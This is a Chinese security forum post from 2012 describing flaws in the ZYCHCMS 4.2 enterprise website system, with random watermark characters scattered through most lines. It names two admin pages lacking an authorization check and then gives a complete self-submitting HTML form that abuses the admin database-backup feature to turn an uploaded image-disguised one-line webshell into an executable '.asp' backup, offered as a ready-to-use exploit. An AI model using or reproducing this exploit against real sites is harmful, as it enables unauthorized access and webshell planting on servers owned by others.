找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1853|回复: 0
打印 上一主题 下一主题

ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:09:51 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

1 U& U& `! x; ~0 M
9 W8 I' Y. p# y  t7 \, V- }. B- N6 A
' H# N  c; T2 j& [( _- q, T9 t
$ N) J5 p. V4 ?8 U0 H* J影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)0 K& ^5 g5 A8 n% h6 j5 d% u- e
①SQL注射漏洞
* v: Z7 W3 l3 ] 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp5 Z* v# c- H# A2 h9 P8 Z8 a/ P
漏洞原因:未过滤
! m- k% C$ ?# D 漏洞代码:
: n' ^4 m* b7 Q' g; i6 H 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
  B) t6 L' x" y0 F+ x 修复方法:在文件开头加入代码
* \2 g2 S& X0 h) N9 X2 v, L0 ^3 u& t' x
* b  r, z7 u+ }+ K4 c' b- B7 y$ `9 F/ `; V
②后台拿WBSHELL" ^$ ]; {# i/ f! t
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。7 D; M3 ?  v  g
这里在网上找了一个,改了下,将就着用。. M) e% {, W3 f
以下是代码本地提交代码
  l8 E! c$ Y' i . K% f8 ]- V( y6 e5 d) N
" F! F# P' g! \3 J' l
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>! h% N4 p  [+ ^5 t! N/ B
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
5 H( Q2 e5 y( R5 h/ y <tr>$ o# o0 r$ L5 J
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
" f) Q  u  P. z. B </tr>4 j9 i( Y( h2 ]2 d" g3 |$ @- K
<tr>3 T8 g- q2 Q( Q5 J- T
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
7 G7 [+ H: P& Q, ] </span>, f2 |. O: f  h2 }
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >' t9 i8 C$ X3 j' {; O! C( h
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
2 m! Y+ @* ?! e; o3 u7 s$ n3 i9 W <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>! x7 A. k; K! R5 S5 t- h' e0 E
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d1 w* r  ~' F8 z
<div align=”left”>4 f. a& b9 A7 x7 |% Y3 ?
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
4 h) a6 h" }% ~* L. L1 P <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>9 f. i' v) H! N# [9 o
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
% z" J+ O% D% \7 E4 n8 h/ Y </div></td>! P& D( F8 q2 g: n% r* P: p/ l
</tr>4 B7 e$ V& r& ^
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>- D/ C1 g+ V) J0 I/ @4 @4 {
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>) @! Z: x, H- i0 c( G
<td class=”td”><div align=”left”>$ }- M7 f; f4 Q6 B0 b7 b6 S
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />1 K$ w& \, ?: Y* {% j; L
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
5 k* O+ t0 M9 c: C" E5 B: V7 | </tr>% \# x! P. M7 d5 N/ E) ~
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>0 Y  S/ J7 Q& a) ~. y
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
' T/ M7 h8 u+ ]3 h+ }9 A <td class=”td”><div align=”left”>
6 I! f3 ]6 S) M1 O# |3 h. R) A' R <input type=”submit” value=”确定备份” class=”btn”
* F/ ?3 L+ R9 _. {0 @ </div></td>1 t  P# a$ n( y7 j, f: o9 j
</tr>
. ^. E1 {2 ?0 g# B' T </table></td></tr></form>, V( r3 c* Z! e& n3 z
</table># d) v/ [% o  R9 }7 Y5 V
</td>3 v# i4 b1 C6 K) @. [# P% V
</tr>$ A- d$ v) `- s" l
</table>
9 H' W% ]5 d* E9 A <script>6 w9 |% T8 j2 j  R0 v  p, a
document.all.add.submit();
6 J" A4 u, ]6 b8 O( e3 t </script>
  e  J; `' a8 U7 ~% e+ g. e0 G* q( c # S6 P* l0 o/ h) Y, q- s, ~3 J' k  K

$ n. N, l0 b; f! V3 Z5 L3 H4 a9 [- m1 O2 ]5 B8 m
0 x; E+ O; y8 M2 r9 V" {
7 k6 }) D7 B, M. B" P  v# ~

2 L7 o5 p( W4 @
8 m4 M0 M$ `1 @8 F$ G$ V9 }% [$ n  v" B

3 g$ b% M, G/ u% g7 C1 p/ ?9 ?: T& F2 n
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表